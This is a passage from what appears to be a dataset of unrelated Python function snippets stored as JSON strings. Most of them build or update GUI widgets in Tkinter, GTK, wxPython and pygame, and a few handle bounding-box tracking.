rd.frame.grid(row=i)", "def create_flowbox(self, flowbox, frame_list):\n\n for num_frame in frame_list:\n grid = Gtk.Grid()\n btn = self.new_thumbnail_button(num_frame)\n\n widget_cls_label = Gtk.Label()\n widget_cls_label.set_text(\"?\")\n widget_cls_label.set_size_request(20, 20)\n widget_cls_label.connect(\"draw\", self.area_on_draw, {'frame': num_frame, 'widget_label': widget_cls_label})\n # Add drawing area\n grid.add(btn)\n grid.attach_next_to(widget_cls_label, btn, Gtk.PositionType.BOTTOM, 1, 2)\n\n flowbox.add(grid)\n self.flowbox_layout = flowbox", "def _draw(self, frame, boxes, probs, landmarks, name):\n try:\n print('drawing')\n for box, prob, ld, id in zip(boxes, probs, landmarks, name):\n # Draw rectangle on frame\n\n cv2.putText(frame, id, (200, 50), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 255), 2, cv2.LINE_AA)\n\n\n except:\n print('not draw box')\n pass\n\n return frame", "def makeWidgets(self):\r\n self._frame = tk.Frame(self, relief=tk.RAISED, borderwidth=1)\r\n self._frame.pack(fill=tk.BOTH, expand=1)\r\n\r\n self.pack(fill=tk.BOTH, expand=1)\r\n\r\n self._frame._label1 = tk.Label(self._frame, text='----File Name----')\r\n self._frame._label1.pack(fill=tk.X, expand=tk.NO, pady=1, padx=2)\r\n self._frame._entry = tk.Entry(self._frame)\r\n self._frame._entry.pack(pady=2, padx=2)\r\n\r\n self._frame._label0 = tk.Label(self._frame, textvariable=self.timestr)\r\n self._setTime(self._elapsedtime)\r\n self._frame._label0.pack(fill=tk.X, expand=tk.NO, pady=3, padx=2)\r\n\r\n self._frame._label2 = tk.Label(self._frame, text='----Laps----')\r\n self._frame._label2.pack(fill=tk.X, expand=tk.NO, pady=4, padx=2)\r\n\r\n self._frame._scrollbar = tk.Scrollbar(self._frame, orient=tk.VERTICAL)\r\n self._frame._listbox = tk.Listbox(self._frame, selectmode=tk.EXTENDED, height=10,\r\n yscrollcommand=self._frame._scrollbar.set)\r\n self._frame._listbox.pack(side=tk.LEFT, fill=tk.BOTH, expand=1, pady=5, padx=2)\r\n self._frame._scrollbar.config(command=self._frame._listbox.yview)\r\n self._frame._scrollbar.pack(side=tk.RIGHT, fill=tk.Y)", "def crear_elements_viewer(self):\n\n self.p2_frame_list = tk.Frame(self.list_frame, borderwidth=2, relief=\"groove\")\n self.p2_label_info = ttk.Label(self.p2_frame_list, text=self.lang.VP_PAC_ID, font=FONT_TITOL)\n self.p2_label_info.pack()\n scrollbar = tk.Scrollbar(self.p2_frame_list)\n scrollbar.pack(side=tk.RIGHT, fill=tk.Y)\n self.llista = tk.Listbox(self.p2_frame_list, yscrollcommand=scrollbar.set, width=15, height=7)\n self.llista.pack(side=tk.LEFT, fill=tk.BOTH, expand=True)\n scrollbar.config(command=self.llista.yview)\n\n self.p2_frame_list_1 = tk.Frame(self.list_frame, borderwidth=2, relief=\"groove\")\n self.p2_label_info_1 = ttk.Label(self.p2_frame_list_1, text=self.lang.VP_LOC, font=FONT_TITOL)\n self.p2_label_info_1.pack()\n scrollbar_1 = tk.Scrollbar(self.p2_frame_list_1)\n scrollbar_1.pack(side=tk.RIGHT, fill=tk.Y)\n self.llista_1 = tk.Listbox(self.p2_frame_list_1, yscrollcommand=scrollbar_1.set, width=15, height=7)\n self.llista_1.pack(side=tk.LEFT, fill=tk.BOTH, expand=True)\n scrollbar_1.config(command=self.llista_1.yview)\n\n self.p2_frame_list_2 = tk.Frame(self.list_frame, borderwidth=2, relief=\"groove\")\n self.p2_label_info_2 = ttk.Label(self.p2_frame_list_2, text=self.lang.VP_DATE, font=FONT_TITOL)\n self.p2_label_info_2.pack()\n scrollbar_2 = tk.Scrollbar(self.p2_frame_list_2)\n scrollbar_2.pack(side=tk.RIGHT, fill=tk.Y)\n self.llista_2 = tk.Listbox(self.p2_frame_list_2, yscrollcommand=scrollbar_2.set, width=15, height=7)\n self.llista_2.pack(side=tk.LEFT, fill=tk.BOTH, expand=True)\n scrollbar_2.config(command=self.llista_2.yview)\n\n self.evo_frame = tk.Frame(self.list_frame)\n self.evo_button = ttk.Button(self.evo_frame, text=self.lang.VP_EVO, command=self.evo_selected)\n self.evo_button.pack()\n self.evo_button.pack_forget()\n\n\n self.p2_frame_elements = tk.Frame(self.data_frame, borderwidth=2, relief=\"groove\")\n self.p2_frame_img = tk.Frame(self.p2_frame_elements)\n self.p2_frame_metadata = tk.Frame(self.p2_frame_elements, width = 20)\n self.p2_label_metadata_code = tk.Label(self.p2_frame_metadata, text=\"\", font=FONT_MSG, width= 15, anchor=\"w\")\n self.p2_label_metadata_code.pack(pady=5)\n self.p2_label_metadata_grade = tk.Label(self.p2_frame_metadata, text=\"\", font=FONT_MSG, width=15, anchor=\"w\")\n self.p2_label_metadata_grade.pack(pady=5)\n self.p2_label_metadata_cm = ttk.Label(self.p2_frame_metadata, text=\"\", font=FONT_MSG, width=15, anchor=\"w\")\n self.p2_label_metadata_cm.pack(pady=5)\n self.assemble_img_frame()", "def reset():\n for frame in added_items_frames:\n frame.destroy()\n added_item_comboboxes.clear()\n added_item_quantity_spinboxes.clear()\n hour_end_spinbox.delete(0, END)\n hour_end_spinbox.insert(0, '1')\n hour_start_spinbox.delete(0, END)\n hour_start_spinbox.insert(0, '1')\n minute_end_spinbox.delete(0, END)\n minute_end_spinbox.insert(0, '0')\n minute_start_spinbox.delete(0, END)\n minute_start_spinbox.insert(0, '0')\n item_combobox.set('')\n item_quantity_spinbox.delete(0, END)\n item_quantity_spinbox.insert(0, '0')\n playstation_numbers_combobox.set('1')\n playstation_prices_combobox.set('Single-20')\n playstation_calculate_label.config(text='0.0')\n playstation_pending_calculation_label.config(text='0.0')", "def _on_frame_changed(self, change):\n self._set_coordinates(self.frame)", "def question_frame():\r\n global question_list_frame, add_question_Frame, quiz_frame\r\n\r\n # Forgetting these frames so they don't overlap and make things hard to read\r\n add_question_Frame.grid_forget()\r\n quiz_frame.grid_forget()\r\n one_person_quiz_frame.grid_forget()\r\n question_list_frame.grid_forget()\r\n\r\n # Creating the label and printing on the main gui the questions\r\n Label(question_list_frame, text=\"Question Pool\").grid(row=0,column=0)\r\n question_list_frame.grid(row=0, column=0, rowspan=7, columnspan=5, sticky=W)", "def makeWidgets(self):\n # globals\n global CARD_SIZE, card_images, card_back, card_sheet, pil_card_cropped, curr_card_image, xloc, d_yloc\n \n canvas.configure(background='green4') \n canvas.pack()\n # add buttons to the frame\n tk.Button(root, text='Deal', command=self.deal).pack(side=\"left\")\n tk.Button(root, text='Hit', command=self.hit).pack(side=\"left\")\n tk.Button(root, text='Stay', command=self.stay).pack(side=\"left\")\n # add label for dealer's hand\n canvas_label_d = canvas.create_text(30, (d_yloc - CARD_SIZE[1]/2), anchor=\"sw\")\n canvas.itemconfig(canvas_label_d, text=\"Dealer's hand: \")\n # add label for player's hand\n canvas_label_p = canvas.create_text(30, (p_yloc - CARD_SIZE[1]/2), anchor=\"sw\")\n canvas.itemconfig(canvas_label_p, text=\"Player's hand: \")\n # add label which updates outcome\n tk.Label(root, textvariable=self.outcome, font=('Helvetica',12), fg='white', bg='black').pack(side=\"left\")\n # add label for updating score\n canvas_label_score = canvas.create_text(CANVAS_WIDTH - 50, 30, anchor=\"sw\")\n canvas.itemconfig(canvas_label_score, text=self.score.get())", "def update(self, frame):\n self.__update_state(frame)\n\n if self.strategy == \"mean\":\n ax = np.mean(np.ravel(self.flow[...,0]))\n ay = np.mean(np.ravel(self.flow[...,1]))\n else:\n ax = statistics.median(np.ravel(self.flow[...,0]))\n ay = statistics.median(np.ravel(self.flow[...,1]))\n\n P = 1\n new_x = int(self.bbox[0] + self.bbox[2] * ax * P)\n new_y = int(self.bbox[1] + self.bbox[3] * ay * P)\n self.bbox = (new_x, new_y, self.bbox[2], self.bbox[3])\n return True, self.bbox", "def add_box(self):\n self.scenes[self.current_scene].add_object(Box())\n self.redraw()", "def updateWidget(self):\n\n if self.frame1.state() == 'normal':\n self.frame2.deiconify()\n self.frame1.withdraw()\n else:\n self.frame2.withdraw()\n self.frame2.update()\n self.frame2.deiconify()\n self.frame1.title(\"%s's turn\" % self.usernames[1])\n self.frame2.title(\"%s's turn\" % self.usernames[0])\n showDialogBox(\"%s's turn first!\" % self.usernames[0])\n self.frame1.update()\n self.frame2.update()", "def update_board(self, mpos):\n pass", "def fillbox(self,forceUpdate=False):\n \n # Only fill the box if the dialog is visible.\n # This is an important protection against bad performance.\n if not forceUpdate and self.top.state() != \"normal\":\n return\n \n self.box.delete(0,\"end\")\n c = self.c ; i = 0\n self.positionList = [] ; tnodeList = []\n for p in c.visitedList:\n if p.exists(c) and p.v.t not in tnodeList:\n self.box.insert(i,p.headString().strip())\n tnodeList.append(p.v.t)\n self.positionList.append(p.copy())\n i += 1", "def createWidgets(self):\n self.myFrame1 = Frame(self)\n self.myFrame2 = Frame(self)\n self.myFrame1.place(x = 100, y = 100)\n self.myFrame2.place(x = 200, y = 100)\n \n self.Label1 = Label(self.myFrame1, text = \"Este es el Frame 1\")\n self.Label2 = Label(self.myFrame2, text = \"Este es el Frame 2\")\n self.Label1.place(x = 100, y = 0)\n self.Label2.place(x = 100, y = 0)\n \n self.Button1 = Button(self, text = \"Dest 1\", command = exit)\n self.Button2 = Button(self, text = \"Dest 2\", command = exit)\n self.Button1.place(x = 200, y = 200)\n self.Button2.place(x = 300, y = 200)", "def computeAndInsertBox(self,**kwargs):\n if self.predefined_box is None:\n self.mm.neglect()\n return\n (pose,new_frame) = self.baxter.frame.computeTransformation() \n if pose is None:\n self.mm.neglect()\n return\n \n try:\n side = kwargs['side']\n except Exception,e:\n rospy.logerr(\"%s\"%str(e))\n self.mm.neglect()\n return\n else:\n self.baxter.frame.setTF(self.predefined_box+'_'+side,pose)\n self.baxter.frame.waitUntilFrameUpdate(self.predefined_box+\"_\"+side)\n self.baxter.scene.createPredefinedBox(self.predefined_box+\"_\"+side,self.predefined_box)\n if self.learning:\n self.appendToTask(\"import tf_helper \\n\")\n self.appendToTask(\"side='%s'\\n\"%(side))\n self.appendToTask(\"baxter.bb.predefined_box='%s'\\n\"%(self.predefined_box))\n self.appendToTask(\"pose = tf_helper.PS('%s',%s,%s)\\n\"%(FRAME_ORIGIN,list(pose.pose.position),list(pose.pose.orientation)))\n self.appendToTask(\"baxter.frame.setTF('%s_'+side,pose)\\n\"%(self.predefined_box))\n self.appendToTask(\"baxter.frame.waitUntilFrameUpdate('%s_'+side)\\n\"%(self.predefined_box))\n self.appendToTask(\"baxter.scene.createPredefinedBox(baxter.bb.predefined_box+'_'+side,baxter.bb.predefined_box)\\n\")\n if self.predefined_box == \"wako\" or self.predefined_box.startswith(\"tray\") is True or self.predefined_box.startswith(\"table\") is True:\n self.appendToTask(\"for drop_off in baxter.scene.boxes[baxter.bb.predefined_box][1].keys():\\n\"%())\n self.appendToTask(\" pose = tf_helper.PS('%s_'+side,%s,%s)\\n\"%(self.predefined_box,\"baxter.scene.boxes[baxter.bb.predefined_box][1][drop_off][0:3]\",\"baxter.scene.boxes[baxter.bb.predefined_box][1][drop_off][3:7]\"))\n self.appendToTask(\" baxter.frame.setTF(drop_off+'_'+side,pose)\\n\")\n if self.predefined_box == \"wako\" or self.predefined_box.startswith(\"tray\") is True or self.predefined_box.startswith(\"table\") is True:\n for drop_off in self.baxter.scene.boxes[self.predefined_box][1].keys():\n pose = PS(self.predefined_box+'_'+side,self.baxter.scene.boxes[self.predefined_box][1][drop_off][0:3],self.baxter.scene.boxes[self.predefined_box][1][drop_off][3:7])\n self.baxter.frame.setTF(drop_off+'_'+side,pose)\n self.mm.confirm()", "def updateWidget(self):\n pass", "def OnSize(self, event):\r\n\r\n for pos, item in self._items.items():\r\n widget, horizontalalignment, verticalalignment = item.widget, item.horizontalalignment, item.verticalalignment\r\n\r\n rect = self.GetFieldRect(pos)\r\n widgetpos = widget.GetPosition()\r\n widgetsize = widget.GetSize()\r\n\r\n rect = self.GetFieldRect(pos)\r\n\r\n if horizontalalignment == ESB_EXACT_FIT:\r\n if verticalalignment == ESB_EXACT_FIT:\r\n widget.SetSize((rect.width-2, rect.height-2))\r\n widget.SetPosition((rect.x-1, rect.y-1))\r\n elif verticalalignment == ESB_ALIGN_CENTER_VERTICAL:\r\n if widgetsize[1] < rect.width - 1:\r\n diffs = (rect.height - widgetsize[1])/2\r\n widget.SetSize((rect.width-2, widgetsize[1]))\r\n widget.SetPosition((rect.x-1, rect.y+diffs))\r\n else:\r\n widget.SetSize((rect.width-2, widgetsize[1]))\r\n widget.SetPosition((rect.x-1, rect.y-1))\r\n elif verticalalignment == ESB_ALIGN_TOP:\r\n widget.SetSize((rect.width-2, widgetsize[1]))\r\n widget.SetPosition((rect.x-1, rect.y))\r\n elif verticalalignment == ESB_ALIGN_BOTTOM:\r\n widget.SetSize((rect.width-2, widgetsize[1]))\r\n widget.SetPosition((rect.x-1, rect.height-widgetsize[1]))\r\n\r\n elif horizontalalignment == ESB_ALIGN_LEFT:\r\n\r\n xpos = rect.x - 1\r\n if verticalalignment == ESB_EXACT_FIT:\r\n widget.SetSize((widgetsize[0], rect.height-2))\r\n widget.SetPosition((xpos, rect.y-1))\r\n elif verticalalignment == ESB_ALIGN_CENTER_VERTICAL:\r\n if widgetsize[1] < rect.height - 1:\r\n diffs = (rect.height - widgetsize[1])/2\r\n widget.SetPosition((xpos, rect.y+diffs))\r\n else:\r\n widget.SetSize((widgetsize[0], rect.height-2))\r\n widget.SetPosition((xpos, rect.y-1))\r\n elif verticalalignment == ESB_ALIGN_TOP:\r\n widget.SetPosition((xpos, rect.y))\r\n elif verticalalignment == ESB_ALIGN_BOTTOM:\r\n widget.SetPosition((xpos, rect.height-widgetsize[1]))\r\n\r\n elif horizontalalignment == ESB_ALIGN_RIGHT:\r\n\r\n xpos = rect.x + rect.width - widgetsize[0] - 1\r\n if verticalalignment == ESB_EXACT_FIT:\r\n widget.SetSize((widgetsize[0], rect.height-2))\r\n widget.SetPosition((xpos, rect.y-1))\r\n elif verticalalignment == ESB_ALIGN_CENTER_VERTICAL:\r\n if widgetsize[1] < rect.height - 1:\r\n diffs = (rect.height - widgetsize[1])/2\r\n widget.SetPosition((xpos, rect.y+diffs))\r\n else:\r\n widget.SetSize((widgetsize[0], rect.height-2))\r\n widget.SetPosition((xpos, rect.y-1))\r\n elif verticalalignment == ESB_ALIGN_TOP:\r\n widget.SetPosition((xpos, rect.y))\r\n elif verticalalignment == ESB_ALIGN_BOTTOM:\r\n widget.SetPosition((xpos, rect.height-widgetsize[1]))\r\n\r\n elif horizontalalignment == ESB_ALIGN_CENTER_HORIZONTAL:\r\n\r\n xpos = rect.x + (rect.width - widgetsize[0])/2 - 1\r\n if verticalalignment == ESB_EXACT_FIT:\r\n widget.SetSize((widgetsize[0], rect.height))\r\n widget.SetPosition((xpos, rect.y))\r\n elif verticalalignment == ESB_ALIGN_CENTER_VERTICAL:\r\n if widgetsize[1] < rect.height - 1:\r\n diffs = (rect.height - widgetsize[1])/2\r\n widget.SetPosition((xpos, rect.y+diffs))\r\n else:\r\n widget.SetSize((widgetsize[0], rect.height-1))\r\n widget.SetPosition((xpos, rect.y+1))\r\n elif verticalalignment == ESB_ALIGN_TOP:\r\n widget.SetPosition((xpos, rect.y))\r\n elif verticalalignment == ESB_ALIGN_BOTTOM:\r\n widget.SetPosition((xpos, rect.height-widgetsize[1]))\r\n\r\n if event is not None:\r\n event.Skip()", "def __init__(self):\r\n Frame.__init__(self)\r\n self.master.title(\"GUIs drawing geometric shapes\")\r\n self.grid()\r\n\r\n #create a canvas and place in this frame\r\n self.canvas = Canvas(self, width = 300, height = 400)\r\n self.canvas.grid(row = 0, column = 0)\r\n\r\n self.canvas.create_rectangle(100, 50, 200, 350)\r\n self.canvas.create_oval(100, 50, 200, 150,\r\n fill = \"white\", tags = \"RED\")\r\n self.canvas.create_oval(100, 150, 200, 250,\r\n fill = \"white\", tags = \"YELLOW\")\r\n self.canvas.create_oval(100, 250, 200, 350,\r\n fill = \"green\", tags = \"GREEN\")\r\n\r\n \r\n dx = 1\r\n while True:\r\n self.canvas.after(2000) # Sleep for 15 milliseconds\r\n self.canvas.update() # Update canvas\r\n if dx == 1:\r\n self.canvas.itemconfigure(\"YELLOW\", fill = \"yellow\")\r\n self.canvas.itemconfigure(\"GREEN\", fill = \"white\")\r\n dx += 1\r\n elif dx == 2:\r\n self.canvas.itemconfigure(\"RED\", fill = \"red\")\r\n self.canvas.itemconfigure(\"YELLOW\", fill = \"white\")\r\n dx += 1 \r\n else:\r\n self.canvas.itemconfigure(\"RED\", fill = \"white\")\r\n self.canvas.itemconfigure(\"GREEN\", fill = \"green\")\r\n dx = 1", "def update_frame_label(self):\n count = len(self.main_frame_list)\n\n for idx in range(count): #Start, count) \n s1 = \"\"\n for i in range(16): #self.main_frame_nibble_list: # 16\n s = \"\"\n for j in range(4):\n s += str(self.main_button_bit_list[idx][i*4 + j].get_label())\n s = s[::-1]\n self.main_frame_nibble_list[idx][i].set_label(str(hex(int(s,2)))[2:].upper())\n s1 += str(self.main_frame_nibble_list[idx][i].get_label())\n s1 = s1[::-1]\n if DEBUG: print(s1[:8] + \" \" + s1[8:])\n self.main_frame_list[idx].set_label(s1[:8] + \" \" + s1[8:])", "def body(self, frame):\n frame.rowconfigure(0, weight=0, pad=5)\n frame.rowconfigure(1, weight=0)\n frame.columnconfigure(0, weight=0)\n frame.columnconfigure(1, weight=0)\n\n self.name_label = tk.Label(frame, width=6, text=\"Name: \")\n self.name_label.grid(column=0, row=0)\n\n self.name_box = tk.Entry(frame, width=30)\n if self.name != \"\":\n self.name_box.insert(0, self.name)\n self.name_box.grid(column=1, row=0)\n\n self.url_label = tk.Label(frame, width=6, text=\"URL: \")\n self.url_label.grid(column=0, row=1)\n self.url_box = tk.Entry(frame, width=30)\n if self.url != \"\":\n self.url_box.insert(0, self.url)\n self.url_box.grid(column=1, row=1)\n return frame", "def update_species_frames(self):\n pass", "def config_frames(self):\n self.root.grid_rowconfigure(1, weight=1)\n self.root.grid_columnconfigure(1, weight=1)\n\n self.top_frame = tkinter.Frame(self.root, pady=1)\n self.top_frame.grid(row=0, columnspan=2, sticky='nsew')", "def update(self):\n self.platform_list.update()\n self.exit_sprite.update()\n self.bagGroup.update()\n self.enemy_list.update()", "def initialize(self):\n self.frame = Frame(master=self.root)\n reslut_text = Label(master=self.frame, text=\"Tulokset\")\n reslut_text.config(font=(\"Courier\", 44))\n reslut_text.grid(row=0, column=0)\n amount_correct_text = Label(master=self.frame, text=\"Oikeat arvaukset:\")\n amount_correct_text.config(font=(\"Courier\", 20))\n amount_correct_text.grid(row=1, column=0)\n\n \"\"\"geting the amount of correct guesses from gamesta class and showing it\"\"\"\n correct_amount, comparison = self.gamestate.get_result()\n full_amount = self.gamestate.get_deck_size()\n result_amount_text = Label(master=self.frame, text=(str(correct_amount)+ \"/\" +str(full_amount)))\n result_amount_text.config(font=(\"Courier\", 20))\n result_amount_text.grid(row=1, column=1)\n\n \"\"\"More text on page\"\"\"\n theese_wrong_text = Label(master=self.frame, text=\"Tässä oikea rivi: \")\n theese_wrong_text.config(font=(\"Courier\", 20))\n theese_wrong_text.grid(row=3, column=0)\n player_answers_text = Label(master=self.frame, text=\"Näin sinä vastasit: \")\n player_answers_text.config(font=(\"Courier\", 20))\n player_answers_text.grid(row=5, column=0)\n\n sf_correct = ScrollableFrame(self.frame)\n sf_user = ScrollableFrame(self.frame)\n\n for i in range(len(comparison)):\n \"\"\"Using scrollable frame to show the right answers\n and guesses (pictures of cards) made by player\"\"\"\n is_correct, correct_card, user_card = comparison[i]\n text = \"vastasit:\\noikein\" if is_correct else \"vastasit:\\nväärin\"\n color = \"green\" if is_correct else \"red\"\n img = create_card_image(sf_correct.scrollable_frame, correct_card, 50,100)\n img.grid(row=0, column=i)\n label = Label(master=sf_correct.scrollable_frame, text= text, fg = color)\n label.grid(row=1,column=i)\n img = create_card_image(sf_user.scrollable_frame, user_card, 50,100)\n img.grid(row=0, column=i)\n label = Label(master=sf_user.scrollable_frame, text= text, fg = color)\n label.grid(row=1,column=i)\n sf_correct.grid(row=4, column=0)\n sf_user.grid(row=6, column=0)\n\n \"\"\"Buttons for navigation\"\"\"\n new_game_button = Button(master=self.frame, text=\"Uusi peli\", command = self.handle_show_game_settings)\n frontpage_button = Button(master=self.frame, text=\"Päävalikkoon\", command = self.handle_show_frontpage_view)\n new_game_button.grid(padx=5, pady=5, sticky=constants.EW)\n frontpage_button.grid(padx=5, pady=5, sticky=constants.EW)", "def update_bboxes(self, ths):\n # find bboxes based on thresholded heatmap\n labels, n_labels = scipy.ndimage.measurements.label(ths)\n detected_bboxes = list()\n for car_label in range(1, n_labels + 1):\n nonzero = (labels == car_label).nonzero()\n bbox = ((np.min(nonzero[1]), np.min(nonzero[0])),\n (np.max(nonzero[1]), np.max(nonzero[0])))\n detected_bboxes.append(bbox)\n self.detected_bboxes = detected_bboxes\n\n # match new and previous detections\n N_known = len(self.averaged_bboxes)\n N_new = len(detected_bboxes)\n dmatrix = np.zeros((N_known, N_new))\n for i in range(N_known):\n for j in range(N_new):\n dmatrix[i,j] = bbox_dist(\n self.averaged_bboxes[i],\n detected_bboxes[j])\n row_ind, col_ind = scipy.optimize.linear_sum_assignment(dmatrix)\n # only consider matches whose centroids are close\n mask = dmatrix[row_ind, col_ind] < self.centroid_radius\n matched_row_ind = row_ind[mask]\n matched_col_ind = col_ind[mask]\n # update moving average \n for i, j in zip(matched_row_ind, matched_col_ind):\n avg_bbox = self.averaged_bboxes[i]\n new_bbox = detected_bboxes[j]\n self.averaged_bboxes[i] = update_bbox(avg_bbox, new_bbox, self.decay)\n\n # remove bounding boxes which are not present anymore\n self.averaged_bboxes = [bbox for i, bbox in enumerate(self.averaged_bboxes) if i in matched_row_ind]\n # add new bounding boxes\n for j in range(N_new):\n if not j in matched_col_ind:\n self.averaged_bboxes.append(detected_bboxes[j])", "def update(self):", "def update(self):", "def update(self):", "def update(self):\r\n self.rect = pygame.Rect(self.x, self.y, self.width, self.height)", "def __init__(self):\n self.master = Tk()\n self.master.title(\"Brick Breaker\")\n self.master.geometry(\"800x600\")\n self.master.minsize(800, 600)\n self.master.iconbitmap(\"data/wall.ico\")\n self.master.config(background=\"lightblue\")\n self.frame = Frame(self.master, bg='lightblue')\n self.littleFrame = Frame(self.frame, bg='lightblue')\n\n # creation des composants\n self.create_title()\n self.create_play_button()\n self.create_quit_button()\n\n # empaquetage\n self.littleFrame.pack(expand=YES, pady=100)\n self.frame.pack(expand=YES)", "def __init__(self, master=None):\n\t\ttkinter.Frame.__init__(self, master)\n\t\tself.master.title('ES Color Chooser')\n\t\tself.grid()\n\n\t\t# create central block of color samples\n\t\tself.labels = [[None for _ in range(3)] for _ in range(3)]\n\t\tfor (col, row) in itertools.product(range(3), range(3)):\n\t\t\tlabel = tkinter.Label(self, width=20, height=10, bg='#FFFFFF')\n\t\t\tlabel.bind('<ButtonRelease-1>', self.clicked)\n\t\t\tlabel.grid(column=col, row=row, padx=1, pady=1)\n\t\t\tself.labels[row][col] = label\n\t\tself.center = self.labels[1][1]\n\n\t\t# create side pane with buttons and history\n\t\tside = tkinter.Frame(self)\n\t\tside.grid(row=0, column=3, rowspan=3)\n\t\ttkinter.Button(side, text='Select new Color', command=self.select_color).pack(side='top')\n\t\tself.sigma = tkinter.Scale(side, label='Sigma', orient='horizontal', from_=1, to=25)\n\t\tself.sigma.pack(side='top')\n\t\tself.sigma.set(10)\n\t\ttkinter.Label(side, text='Current color').pack(side='top')\n\t\tself.current = tkinter.StringVar()\n\t\tcurrent = tkinter.Entry(side, justify='center', textvariable=self.current)\n\t\tcurrent.pack(side='top')\n\t\ttkinter.Label(side, text='History').pack(side='top')\n\t\tself.history = tkinter.Listbox(side, height='16', bg='white', activestyle='dotbox')\n\t\tself.history.bind('<ButtonRelease-1>', self.clicked)\n\t\tself.history.pack(side='top')", "def _sync_gui(self):\n self._update_buttons()\n\n self.turn_value_label.config(text=self.turn_value_text)\n self.selected_piece_value_label.config(text=self.selected_piece_value_text)\n\n self.update()", "def _configure_interior(event):\n # update the scrollbars to match the size of the inner frame\n size = (self.internal_frame.winfo_reqwidth(), self.internal_frame.winfo_reqheight())\n self.canvas.config(scrollregion=\"0 0 %s %s\" % size)\n if self.internal_frame.winfo_reqwidth() != self.canvas.winfo_width():\n # update the canvas's width to fit the inner frame\n self.canvas.config(width=self.internal_frame.winfo_reqwidth())\n if self.internal_frame.winfo_reqheight() != self.canvas.winfo_height():\n # update the canvas's width to fit the inner frame\n self.canvas.config(height=self.internal_frame.winfo_reqheight())", "def update(self, *args, **kwargs):\r\n \r\n if self.changed:\r\n \r\n for e in self.entries + self.bottom_entries:\r\n e.changed = True\r\n \r\n if self.title is not None:\r\n title_size = list(self.font.size(self.title))\r\n title_size[1] = self.font.get_height()\r\n else:\r\n title_size = (0,0)\r\n \r\n self.min_button_size = self.calculate_min_button_size()\r\n self.min_bottom_button_size = self.calculate_min_bottom_button_size()\r\n \r\n if len(self.bottom_entries) == 0:\r\n bottom_buttons_spacing = 0\r\n else:\r\n bottom_buttons_spacing = self.min_bottom_button_size[1] \\\r\n + self.button_vspacing\r\n \r\n button_vstep = self.min_button_size[1] + self.button_vspacing\r\n button_hstep = self.min_bottom_button_size[0] + self.button_hspacing\r\n \r\n buttons_rect = Rect(\r\n 0,\r\n 0,\r\n max(self.min_button_size[0],\r\n button_hstep * len(self.bottom_entries) - self.button_hspacing,\r\n title_size[0]),\r\n button_vstep * len(self.entries) - self.button_vspacing\r\n )\r\n \r\n buttons_rect.center = self.screen_rect.center\r\n \r\n \r\n bg_rect = buttons_rect.inflate(self.h_inborders \\\r\n + self.right_space,\r\n self.v_inborders \\\r\n + self.top_space \\\r\n + self.bottom_space \\\r\n + bottom_buttons_spacing\\\r\n + title_size[1])\r\n buttons_rect.x = bg_rect.x + self.h_inborders // 2\r\n buttons_rect.y = bg_rect.y \\\r\n + self.v_inborders // 2 \\\r\n + self.top_space \\\r\n + title_size[1]\r\n \r\n bottom_buttons_rect = Rect(bg_rect.x + self.h_inborders // 2,\r\n buttons_rect.bottom \\\r\n + self.button_vspacing,\r\n bg_rect.w - self.h_inborders,\r\n self.min_bottom_button_size[1]\r\n )\r\n \r\n for i, entry in enumerate(self.entries):\r\n entry.rect = Rect(buttons_rect.x,\r\n buttons_rect.y + i*button_vstep,\r\n self.min_button_size[0],\r\n self.min_button_size[1])\r\n entry.rect.centerx = buttons_rect.centerx\r\n \r\n self.bottom_button_align.align(bottom_buttons_rect,\r\n self.bottom_entries,\r\n self.button_hspacing,\r\n self.min_bottom_button_size)\r\n \r\n self.background.image = \\\r\n self.render_background(bg_rect.w, bg_rect.h)\r\n self.background.rect = bg_rect\r\n \r\n self.buttons_rect = buttons_rect\r\n \r\n self.changed = False\r\n \r\n super().update(*args, **kwargs)", "def frame(self):", "def update(self):\n self.board.update()", "def draw_boxes(self, im, boxes):\n for bbox in boxes:\n l = [int(x) for x in bbox[\"coords\"]]\n l = self.scalebox(l)\n icon = self.classes_to_icons[bbox[\"label\"]]\n overlay_im_to_background(im, icon, l[0], l[1] - icon.shape[0] - 5)\n cv2.rectangle(im,(l[0],l[1]),(l[2],l[3]),self.color,2)", "def _update_boxes(self, x,y):\n\t\talloc = self.alloc2img()\n\t\t\n\t\tif not rect_contains(alloc, x,y):\n\t\t\t# The mouse has left the widget\n\t\t\tself._changed_rect = None\n\t\t\tself._boxes_under_cursor = []\n\t\t\treturn True\n\t\t\n\t\tif self._changed_rect is None or not rect_contains(self._changed_rect, x, y):\n\t\t\tif len(self.model) == 0: return False\n\t\t\t# The mouse left the common area\n#\t\t\tif __debug__: print '(%i,%i)' % (x,y),\n\t\t\t\n#\t\t\tif __debug__: print \"Old rect:\", tuple(self._changed_rect) if self._changed_rect is not None else self._changed_rect,\n\t\t\tself._changed_rect = None\n\t\t\t\t\n\t\t\t\n\t\t\t# Calculate new boxes\n\t\t\tnewboxes = self.find_boxes_under_coord(x,y)\n\t\t\tself._boxes_under_cursor = newboxes\n#\t\t\tif __debug__: print \"newboxes:\", newboxes,\n\t\t\t\n\t\t\t# Update the caching rectangle\n\t\t\tif len(newboxes):\n\t\t\t\tchanged = newboxes[0].rect\n\t\t\telse: # Outside of any boxes, use allocation\n\t\t\t\tchanged = alloc\n\t\t\tfor b in newboxes[1:]:\n\t\t\t\tchanged = changed.intersect(b.rect)\n\t\t\tfor r in self.model:\n\t\t\t\tb = r[self.box_col]\n\t\t\t\tif b not in newboxes:\n\t\t\t\t\tchanged = rect_diff(changed, b.rect, (x,y))\n\t\t\tif changed == alloc: # This is so extrodinarily BAD that we should test for it.\n\t\t\t\t# It's bad because if it were true, the cache would never clear\n\t\t\t\tfrom warnings import warn\n\t\t\t\twarn(\"The chosen change rect was the allocation. THIS SHOULD'T HAPPEN.\")\n\t\t\t\tchanged = None\n\t\t\tif __debug__: print \"Change rect:\", changed\n\t\t\tself._changed_rect = changed\n\t\t\tassert changed is None or rect_contains(changed, x,y)\n\t\t\tif __debug__: self.queue_draw()\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False", "def __call__(self):\n self.brain._update_fscale(self.factor)\n for key in self.brain.keys:\n if self.widgets[key] is not None:\n self.widgets[key].set_value(self.brain._data[key])", "def _update_frame(self):\n # check if continue\n if self._keep_updating:\n self.__frame = self._cam.get_display_frame()\n if self.__frame is not None:\n self._cvn_camera_viewfinder.create_image(0, 0, image=self.__frame, anchor=tk.NW)\n\n self._root.after(self._delay, self._update_frame)", "def __init__(self, master, num_pokemon):\n super().__init__(master)\n self._num_pokemon = num_pokemon\n self._master = master\n self.pokeballs = 0\n\n #insert image of pokeball\n frame1 = 